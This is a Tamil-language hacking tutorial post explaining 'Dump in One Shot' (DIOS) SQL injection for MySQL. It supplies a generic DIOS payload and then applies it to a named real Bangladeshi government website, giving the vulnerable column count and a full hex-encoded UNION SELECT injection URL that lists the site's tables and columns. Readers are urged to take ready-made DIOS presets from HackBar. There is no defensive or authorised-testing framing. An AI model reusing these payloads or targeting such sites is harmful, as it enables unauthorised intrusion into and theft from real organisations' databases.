DIOS என்றால் என்ன?


DIOS (Dump in One Shot) இந்த முறையானது SQL VULN இருக்கும் Site –ல் ஒரே Shot –ல்  DATABASE-ல் உள்ள அனைத்து DATA-களையும் எடுப்பது அகும்.


ஆனால் நாம் இன்று பார்க்க போவது ஒவ்வொரு Columns –ஆக Extract செய்யாமல் ஒரே Shot-ல் அனைத்து DATA-களையும் எடுப்பது என்று பார்போம்.

அதாவது நீங்கள் group_concat(table_name),5,6+from+information_schema.tables+where+table_schema=database()--+ போன்ற Command-ஐ ஒவ்வோரு முறையும் கொடுக்க தேவையில்லை.

DIOS Command (select (@a) from (select(@a:=0x00),(select (@a) from (information_schema.tables)where (@a)in (@a:=*concat*/(@a,table_name,'<br>'))))a)
 இப்போது இந்த Command-ல் @a என்று இருப்பது Table Number அதாவது Table Number 1,2,3 அல்லது a,b,c என்று எப்படி வேண்டுமானாலும் கொடுக்கலாம். 
நான் நேரடியாக Columns Name தெரியாமல் Inject செய்யபோகிறோம்.
அதனால் நாம் Colomns Name-க்கு  0x00 என வைத்து கொள்வோம்.
 <br> Tag இது HTML CODE ஆகும்,இது Table Name-ஐ வரிசையாக Print செய்ய உதவுகிறது. DIOS –கு Command-ல் group என்ற Command –ஐ சேர்க்ககூடாது.

மற்றபடி இந்த Command-கள் உங்களுக்கு புரியும் என நினைக்கிறேன். 
இதுபோன்ற Command களின் விளக்கம் பழைய பதிவில் கூறீவிடேன். DIOS Command-ல் ( )-ஐ அதிகமாக பயன்படுத்தப்பட்டிருக்கும்.

இந்த முறை  நான் எடுத்து கொண்ட Site 





இதில் உள்ள Columns 4 ஆகும்.   vulnerable Columns  2 ,3 http://www.lict.gov.bd/news_events.php?id=-21+UNION+ALL+SELECT+1,2,3,4--
.


இந்த 2 OR 3 இதில் ஏதேனும் ஒன்றில் DIOS Command-ஐ கொடுக்கவும். DIOS Command-ஐ பெற HAckBar-ல் DIOS MYSQL என்பதில் உங்களுக்கு தேவயான   DIOS Command-ஐ Click செய்து Execute கொடுக்கவும். 




இப்போது உங்களுக்கு அந்த Site-ல் உள்ள அனைத்து DATA-களும் காட்டப்படும்.
http://www.lict.gov.bd/news_events.php?id=-21+UNION+ALL+SELECT+1,(select(@x)from(select(@x:=0x00),(@running_number:=0),(@tbl:=0x00),(select(0)from(information_schema.columns)where(table_schema=database())and(0x00)in(@x:=Concat(@x,0x3c62723e,if((@tbl!=table_name),Concat(0x3c2f6469763e,LPAD(@running_number:=@running_number%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d7265643e,@tbl:=table_name,0x3c2f666f6e743e,0x3c62723e,(@z:=0x00),0x3c646976207374796c653d226d617267696e2d6c6566743a333070783b223e), 0x00),lpad(@z:=@z%2b1,2,0x30),0x3a292020,0x3c666f6e7420636f6c6f723d626c75653e,column_name,0x3c2f666f6e743e))))x),3,4--+






குறிப்பு நீங்கள் DIOS MYSQL-ஐ Open செய்யும் போது DIOS by 7rojan,DIOS by zero என்ற பெயர்கள் காட்டப்படும்,

அவையேல்லாம் Hackers CODE Name. 
ஒவ்வோரு Hacker-ம் தங்களுக்கென தனி STYLE-ல் DIOS Code-ஐ Create செய்து இருப்பார்கள்.அதில் உங்களுக்கு தேவையான STYLE-ஐ எடுத்து பயன்படுத்தி கொள்ளுங்கள்.இதில் உள்ள Command-கள் HEX –ஆக Convert செய்யபட்டிருக்கும்.
உங்களுக்கு தனியான STYLE-ஐயும் நீங்கள் உருவாக்கி கொள்ளவும்.                                                               
                       WATCH VIDEO  
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                            

No comments